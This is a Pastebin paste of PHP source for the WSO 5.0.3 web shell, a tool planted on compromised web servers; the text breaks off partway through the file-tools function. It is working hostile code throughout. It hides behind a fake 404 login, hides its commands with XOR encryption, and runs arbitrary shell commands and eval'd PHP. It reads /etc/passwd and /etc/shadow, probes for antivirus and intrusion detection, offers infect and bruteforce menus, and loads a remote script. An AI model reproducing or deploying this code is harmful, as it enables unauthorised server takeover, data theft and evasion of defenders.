API tools faq
paste
ToKeiChun

WSO Version 5.0.3 [Bypass SecureServer Firewall]

ToKeiChun
Jan 1st, 2021 (edited)
369
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 67.94 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //-----------------Password---------------------
  3. //$_password = "21232f297a57a5a743894a0e4a801fc3"; //admin
  4. $_agent = true;
  5. $_unicode = 'UTF-8';
  6. $_action = 'Anonymizer';
  7.  
  8. $Drupal = md5($_SERVER['HTTP_USER_AGENT']);
  9. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
  10.     prototype(md5($_SERVER['HTTP_HOST'])."key", $Drupal);
  11. }
  12. if(empty($_POST['charset']))
  13.     $_POST['charset'] = $_unicode;
  14. if (!isset($_POST['ne'])) {
  15.     if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  16.     if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  17.     if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  18.     if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  19.     if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  20. }
  21. function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
  22. @ini_set('error_log',NULL);
  23. @ini_set('log_errors',0);
  24. @ini_set('max_execution_time',0);
  25. @set_time_limit(0);
  26. if (PHP_VERSION_ID < 70000)
  27.     @set_magic_quotes_runtime(0);
  28. @define('VERSION', '5.0.3');
  29. if(get_magic_quotes_gpc()) {
  30.     function stripslashes_array($array) {
  31.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  32.     }
  33.     $_POST = stripslashes_array($_POST);
  34.     $_COOKIE = stripslashes_array($_COOKIE);
  35. }
  36. /* (С) 11.2011 oRb */
  37. if(!empty($_password)) {
  38.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $_password))
  39.         prototype(md5($_SERVER['HTTP_HOST']), $_password);
  40.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $_password))
  41.         hardLogin();
  42. }
  43. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  44.     $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$_agent;
  45. function hardLogin() {
  46.         if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  47.           $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  48.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  49.           header('HTTP/1.0 404 Not Found');
  50.           exit;
  51.           }
  52.         }
  53.         echo "";
  54.     die("<style>* {margin:0 !important;padding:0 !important;}</style><meta name=robots content=noindex><body><pre><form method=post style='position:absolute !important;'><input type=password name=pass style='background-color:transparent !important;border:none !important;outline:none !important;' required><input type=submit name='watching' value='submit' style='border:none !important;background-color:transparent !important;color:transparent !important;cursor:pointer !important;'></form></pre><iframe name='iframe_id' id='iframe_id' src=" .'//'. $_SERVER['SERVER_NAME'] .'/404'. " onload='document.title=this.contentDocument? this.contentDocument.title : this.contentWindow.document.title;' width=100% height=100% scrolling=auto frameborder=0 style='border:none !important;'></iframe>
  55.     <script type='text/javascript'>
  56.     (function(el, w){
  57.         function loadFunc(e){
  58.             e = e || w.event;
  59.             var f = e.target || e.srcElement, fb = f.contentDocument || f.contentWindow.document;
  60.             document.title = fb.title;
  61.         }
  62.         if (w.addEventListener)
  63.             el.addEventListener('load', loadFunc, false);
  64.         else if (w.attachEvent)
  65.             el.attachEvent('onload', loadFunc);
  66.     })(document.getElementById('iframe_id'), window);
  67.     </script>
  68.     <body>");
  69. }
  70. if(strtolower(substr(PHP_OS,0,3)) == "win")
  71.     $os = 'win';
  72. else
  73.     $os = 'nix';
  74. $safe_mode = @ini_get('safe_mode');
  75. if(!$safe_mode)
  76.     error_reporting(0);
  77. $disable_functions = @ini_get('disable_functions');
  78. $home_cwd = @getcwd();
  79. if(isset($_POST['c']))
  80.     @chdir($_POST['c']);
  81. $cwd = @getcwd();
  82. if($os == 'win') {
  83.     $home_cwd = str_replace("\\", "/", $home_cwd);
  84.     $cwd = str_replace("\\", "/", $cwd);
  85. }
  86. if($cwd[strlen($cwd)-1] != '/')
  87.     $cwd .= '/';
  88. /* (С) 04.2015 Pirat */
  89. function hardHeader() {
  90.     if(empty($_POST['charset']))
  91.         $_POST['charset'] = $GLOBALS['_unicode'];
  92.     echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
  93. <style>
  94.     .e, .v, .h, .h th {background-color:#060A10 !important; border: none !important;}
  95.     body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
  96.     body,td,th  {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
  97.     table       {width:inherit !important; box-shadow: none !important;}
  98.     table.info  {background:#060a10; color:#C3C3C3;}
  99.     table.main  {width:100% !important;}
  100.     table#toolsTbl {background-color: #060A10;}
  101.     span,h1,a   {color:#fff !important;}
  102.     span        {font-weight:bolder;}
  103.     h1          {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
  104.     div.content {padding:5px;margin-left:5px;background-color:#060a10;}
  105.     a           {text-decoration:none;}
  106.     a:hover     {text-decoration:underline;}
  107.     .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
  108.     .tooltip:hover::after {opacity:1;visibility:visible;}
  109.     .ml1        {border:1px solid #12151d;padding:5px;margin:0;overflow:auto;}
  110.     .bigarea    {min-width:100%; max-width:100%; height:400px;}
  111.     input, textarea, select {margin:0; padding-top:2px; color:#fff;background-color:#12151d;border:none;font:9pt Courier New;outline:none;}
  112.     input:hover, textarea:hover, select:hover {background-color:#202832;}
  113.     input:focus, textarea:focus, select:focus {background-color:#202832;}
  114.     input:-webkit-autofill {-webkit-box-shadow: inset 0 0 0 50px #12151d !important;-webkit-text-fill-color: #fff !important;color: #fff !important;}
  115.     label {position:relative}
  116.     label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
  117.     label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
  118.     form        {margin:0px;}
  119.     #toolsTbl   {text-align:center;}
  120.     #fak        {background:none;}
  121.     #fak td     {padding:5px 0 0 0;}
  122.     iframe      {border:1px solid #060a10;}
  123.     .toolsInp   {width:300px}
  124.     .main th    {text-align:left;background-color:#060a10;}
  125.     .main td, th{vertical-align:middle;}
  126.     input[type='submit']{background-color:#2E6E9C;}
  127.     input[type='button']{background-color:#2E6E9C;}
  128.     input[type='submit']:hover{background-color:#56AD15;}
  129.     input[type='button']:hover{background-color:#56AD15;}
  130.     .l1         {background-color:#12151d;}
  131.     .fm tr:hover {background-color:#202832;}   
  132.     pre         {font:9pt Courier New;}
  133. </style>
  134. <script>
  135.    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  136.    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  137.    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  138.    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
  139.    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
  140.    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
  141.    var d = document;
  142.    
  143.     function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
  144.     function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
  145.     function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
  146.     function set(a,c,p1,p2,p3,charset) {
  147.         if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  148.         if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  149.         if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  150.         if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  151.         if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  152.         d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  153.         d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  154.         d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  155.         d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  156.         d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  157.         if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  158.     }
  159.     function g(a,c,p1,p2,p3,charset) {
  160.         set(a,c,p1,p2,p3,charset);
  161.         d.mf.submit();
  162.     }
  163.     function a(a,c,p1,p2,p3,charset) {
  164.         set(a,c,p1,p2,p3,charset);
  165.         var params = 'ajax=true';
  166.         for(i=0;i<d.mf.elements.length;i++)
  167.             params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  168.         sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
  169.     }
  170.     function sr(url, params) {
  171.         if (window.XMLHttpRequest)
  172.             req = new XMLHttpRequest();
  173.         else if (window.ActiveXObject)
  174.             req = new ActiveXObject('Microsoft.XMLHTTP');
  175.        if (req) {
  176.            req.onreadystatechange = processReqChange;
  177.            req.open('POST', url, true);
  178.            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  179.            req.send(params);
  180.        }
  181.     }
  182.     function processReqChange() {
  183.         if( (req.readyState == 4) )
  184.             if(req.status == 200) {
  185.                 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  186.                 var arr=reg.exec(req.responseText);
  187.                 eval(arr[2].substr(0, arr[1]));
  188.             } else alert('Request error!');
  189.     }
  190. </script>
  191. <script src='//importantscripts.github.io/jquery.min.js'></script>
  192. <head><body><div style='position:absolute;background-color:rgba(18, 21, 29, 0.48);width:100%;top:0;left:0;'>
  193. <form method=post name=mf style='display:none;'>
  194. <input type=hidden name=a>
  195. <input type=hidden name=c>
  196. <input type=hidden name=p1>
  197. <input type=hidden name=p2>
  198. <input type=hidden name=p3>
  199. <input type=hidden name=charset>
  200. </form>";
  201.     $freeSpace = @diskfreespace($GLOBALS['cwd']);
  202.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  203.     $totalSpace = $totalSpace?$totalSpace:1;
  204.     $release = @php_uname('r');
  205.     $kernel = @php_uname('s');
  206.     $explink = 'http://www.exploit-db.com/search/?action=search&description=';
  207.     if(strpos('Linux', $kernel) !== false)
  208.         $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
  209.     else
  210.         $explink .= urlencode($kernel . ' ' . substr($release,0,3));
  211.     if(!function_exists('posix_getegid')) {
  212.         $user = @get_current_user();
  213.         $uid = @getmyuid();
  214.         $gid = @getmygid();
  215.         $group = "?";
  216.     } else {
  217.         $uid = @posix_getpwuid(@posix_geteuid());
  218.         $gid = @posix_getgrgid(@posix_getegid());
  219.         $user = $uid['name'];
  220.         $uid = $uid['uid'];
  221.         $group = $gid['name'];
  222.         $gid = $gid['gid'];
  223.     }
  224.     $cwd_links = '';
  225.     $path = explode("/", $GLOBALS['cwd']);
  226.     $n=count($path);
  227.     for($i=0; $i<$n-1; $i++) {
  228.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  229.         for($j=0; $j<=$i; $j++)
  230.             $cwd_links .= $path[$j].'/';
  231.         $cwd_links .= "\")'>".$path[$i]."/</a>";
  232.     }
  233.     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  234.     $opt_charsets = '';
  235.     foreach($charsets as $microsoft)
  236.         $opt_charsets .= '<option value="'.$microsoft.'" '.($_POST['charset']==$microsoft?'selected':'').'>'.$microsoft.'</option>';
  237.     $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Anonymizer'=>'Anonymizer','Network'=>'Network');
  238.     if(!empty($GLOBALS['_password']))
  239.     $m['Logout'] = 'Logout';
  240.     $m['Self remove'] = 'SelfRemove';
  241.     $menu = '';
  242.     foreach($m as $k => $v)
  243.         $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  244.     $drives = "";
  245.     if ($GLOBALS['os'] == 'win') {
  246.         foreach(range('c','z') as $drive)
  247.         if (is_dir($drive.':\\'))
  248.             $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  249.     }
  250.     /* (С) 08.2015 dmkcv */
  251.     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
  252.          '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="'.$explink.'" target=_blank>[ Exploit-DB ]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
  253.          '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
  254.          '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div>';
  255. }
  256. function hardFooter() {
  257.     $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
  258.     echo "
  259. </div>
  260. <table class='info main' id=toolsTbl cellpadding=3 cellspacing=0>
  261.     <tr>
  262.         <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>
  263.         <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
  264.     </tr><tr>
  265.         <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
  266.         <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
  267.     </tr><tr>
  268.         <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
  269.         <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
  270.         <input type=hidden name=a value='FilesMan'>
  271.         <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  272.         <input type=hidden name=p1 value='uploadFile'>
  273.         <input type=hidden name=ne value=''>
  274.         <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  275.         <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>
  276.     </tr></table></div>
  277.     </body></html>";
  278. }
  279. if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
  280. if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
  281.  
  282. $var_exec = 'exec';
  283. $var_passthru = 'passthru';
  284. $var_system = 'system';
  285. $var_shell_exec = 'shell_exec';
  286.  
  287. function ex($in) {
  288.     $apple = '';
  289.     if (function_exists($var_exec)) {
  290.         @exec($in,$apple);
  291.         $apple = @join("\n",$apple);
  292.     } elseif (function_exists($var_passthru)) {
  293.         ob_start();
  294.         @passthru($in);
  295.         $apple = ob_get_clean();
  296.     } elseif (function_exists($var_system)) {
  297.         ob_start();
  298.         @system($in);
  299.         $apple = ob_get_clean();
  300.     } elseif (function_exists($var_shell_exec)) {
  301.         $apple = shell_exec($in);
  302.     } elseif (is_resource($f = @popen($in,"r"))) {
  303.         $apple = "";
  304.         while(!@feof($f))
  305.             $apple .= fread($f,1024);
  306.         pclose($f);
  307.     } else return "↳ Unable to execute command\n";
  308.     return ($apple==''?"↳ Query did not return anything\n":$apple);
  309. }
  310. function viewSize($s) {
  311.     if($s >= 1073741824)
  312.         return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  313.     elseif($s >= 1048576)
  314.         return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  315.     elseif($s >= 1024)
  316.         return sprintf('%1.2f', $s / 1024 ) . ' KB';
  317.     else
  318.         return $s . ' B';
  319. }
  320. function perms($p) {
  321.     if (($p & 0xC000) == 0xC000)$i = 's';
  322.     elseif (($p & 0xA000) == 0xA000)$i = 'l';
  323.     elseif (($p & 0x8000) == 0x8000)$i = '-';
  324.     elseif (($p & 0x6000) == 0x6000)$i = 'b';
  325.     elseif (($p & 0x4000) == 0x4000)$i = 'd';
  326.     elseif (($p & 0x2000) == 0x2000)$i = 'c';
  327.     elseif (($p & 0x1000) == 0x1000)$i = 'p';
  328.     else $i = 'u';
  329.     $i .= (($p & 0x0100) ? 'r' : '-');
  330.     $i .= (($p & 0x0080) ? 'w' : '-');
  331.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  332.     $i .= (($p & 0x0020) ? 'r' : '-');
  333.     $i .= (($p & 0x0010) ? 'w' : '-');
  334.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  335.     $i .= (($p & 0x0004) ? 'r' : '-');
  336.     $i .= (($p & 0x0002) ? 'w' : '-');
  337.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  338.     return $i;
  339. }
  340. function viewPermsColor($f) {
  341.     if (!@is_readable($f))
  342.         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  343.     elseif (!@is_writable($f))
  344.         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  345.     else
  346.         return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
  347. }
  348. function hardScandir($dir) {
  349.     if(function_exists("scandir")) {
  350.         return scandir($dir);
  351.     } else {
  352.         $dh  = opendir($dir);
  353.         while (false !== ($filename = readdir($dh)))
  354.             $files[] = $filename;
  355.         return $files;
  356.     }
  357. }
  358. function which($p) {
  359.     $path = ex('which ' . $p);
  360.     if(!empty($path))
  361.         return $path;
  362.     return false;
  363. }
  364. function actionRC() {
  365.     if(!@$_POST['p1']) {
  366.         $a = array(
  367.             "uname" => php_uname(),
  368.             "php_version" => phpversion(),
  369.             "VERSION" => VERSION,
  370.             "safemode" => @ini_get('safe_mode')
  371.         );
  372.         echo serialize($a);
  373.     } else {
  374.         eval($_POST['p1']);
  375.     }
  376. }
  377. function prototype($k, $v) {
  378.     $_COOKIE[$k] = $v;
  379.     setcookie($k, $v);
  380. }
  381. function actionSecInfo() {
  382.     hardHeader();
  383.     echo '<h1>Server security information</h1><div class=content>';
  384.     function showSecParam($n, $v) {
  385.         $v = trim($v);
  386.         if($v) {
  387.             echo '<span>' . $n . ': </span>';
  388.             if(strpos($v, "\n") === false)
  389.                 echo $v . '<br>';
  390.             else
  391.                 echo '<pre class=ml1>' . $v . '</pre>';
  392.         }
  393.     }
  394.     showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  395.     if(function_exists('apache_get_modules'))
  396.         showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  397.     showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
  398.     showSecParam('Open base dir', @ini_get('open_basedir'));
  399.     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  400.     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  401.     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  402.     $temp=array();
  403.     if(function_exists('mysql_get_client_info'))
  404.         $temp[] = "MySql (".mysql_get_client_info().")";
  405.     else
  406.         $temp[] = "MySql (".mysqli_get_client_info().")";
  407.     if(function_exists('mssql_connect'))
  408.         $temp[] = "MSSQL";
  409.     if(function_exists('pg_connect'))
  410.         $temp[] = "PostgreSQL";
  411.     if(function_exists('oci_connect'))
  412.         $temp[] = "Oracle";
  413.     showSecParam('Supported databases', implode(', ', $temp));
  414.     echo '<br>';
  415.     if($GLOBALS['os'] == 'nix') {
  416.             showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  417.             showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
  418.             showSecParam('OS version', @file_get_contents('/proc/version'));
  419.             showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  420.             if(!$GLOBALS['safe_mode']) {
  421.                 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  422.                 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  423.                 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  424.                 echo '<br>';
  425.                 $temp=array();
  426.                 foreach ($userful as $microsoft)
  427.                     if(which($microsoft))
  428.                         $temp[] = $microsoft;
  429.                 showSecParam('Userful', implode(', ',$temp));
  430.                 $temp=array();
  431.                 foreach ($danger as $microsoft)
  432.                     if(which($microsoft))
  433.                         $temp[] = $microsoft;
  434.                 showSecParam('Danger', implode(', ',$temp));
  435.                 $temp=array();
  436.                 foreach ($downloaders as $microsoft)
  437.                     if(which($microsoft))
  438.                         $temp[] = $microsoft;
  439.                 showSecParam('Downloaders', implode(', ',$temp));
  440.                 echo '<br/>';
  441.                 showSecParam('HDD space', ex('df -h'));
  442.                 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  443.                 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  444.             }
  445.     } else {
  446.         showSecParam('OS Version',ex('ver'));
  447.         showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
  448.         showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
  449.     }
  450.     echo '</div>';
  451.     hardFooter();
  452. }
  453. /* (С) 10.2012 Svet */
  454. function actionFilesTools() {
  455.     if( isset($_POST['p1']) )
  456.         $_POST['p1'] = urldecode($_POST['p1']);
  457.     if(@$_POST['p2']=='download') {
  458.         if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
  459.             ob_start("ob_gzhandler", 4096);
  460.             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  461.             if (function_exists("mime_content_type")) {
  462.                 $type = @mime_content_type($_POST['p1']);
  463.                 header("Content-Type: " . $type);
  464.             } else
  465.                 header("Content-Type: application/octet-stream");
  466.             $fp = @fopen($_POST['p1'], "r");
  467.             if($fp) {
  468.                 while(!@feof($fp))
  469.                     echo @fread($fp, 1024);
  470.                 fclose($fp);
  471.             }
  472.         }exit;
  473.     }
  474.     if( @$_POST['p2'] == 'mkfile' ) {
  475.         if(!file_exists($_POST['p1'])) {
  476.             $fp = @fopen($_POST['p1'], 'w');
  477.             if($fp) {
  478.                 $_POST['p2'] = "edit";
  479.                 fclose($fp);
  480.             }
  481.         }
  482.     }
  483.     hardHeader();
  484.     echo '<h1>File tools</h1><div class=content>';
  485.     if( !file_exists(@$_POST['p1']) ) {
  486.         echo 'File not exists';
  487.         hardFooter();
  488.         return;
  489.     }
  490.     $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  491.     if(!$uid) {
  492.         $uid['name'] = @fileowner($_POST['p1']);
  493.         $gid['name'] = @filegroup($_POST['p1']);
  494.     } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
  495.     echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  496.     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  497.     if( empty($_POST['p2']) )
  498.         $_POST['p2'] = 'view';
  499.     if( is_file($_POST['p1']) )
  500.         $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
  501.     else
